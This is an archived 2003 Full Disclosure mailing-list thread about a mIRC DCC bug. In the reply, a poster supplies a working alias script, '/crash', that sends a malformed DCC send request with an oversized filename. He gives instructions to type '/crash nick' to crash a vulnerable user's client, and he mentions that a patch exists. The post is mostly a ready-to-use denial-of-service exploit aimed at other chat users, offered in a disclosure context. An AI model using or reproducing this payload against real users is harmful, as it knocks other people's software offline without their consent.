Full Disclosure mailing list archives
Re: mIRC DCC Exploit
From: "Nils" <panther- () gmx de>
Date: Wed, 15 Oct 2003 09:54:24 +0200
Hi,
Add this to your aliases.ini :
/crash {
.raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1))
}
then type : /crash nick
"nick" will crash when vulnerable.
New patched version is avaiable at www.mirc.com .
----- Original Message -----
From: Saint
To: full-disclosure () lists netsys com
Sent: Wednesday, October 15, 2003 8:14 AM
Subject: [Full-disclosure] mIRC DCC Exploit
There is some new bug in mirc6.0x which can crash the prog when sending a DCC-request(or something). Does anyone know
more about this?
thanks
btw, my first post to this group =)
Patrik Nisen
_______________________________________________ Full-Disclosure - We believe in it. Charter:
http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- mIRC DCC Exploit Saint (Oct 14)
- RE: mIRC DCC Exploit Poof (Oct 15)
- Re: mIRC DCC Exploit Nils (Oct 15)
- Re: mIRC DCC Exploit Brett Campbell (Oct 15)
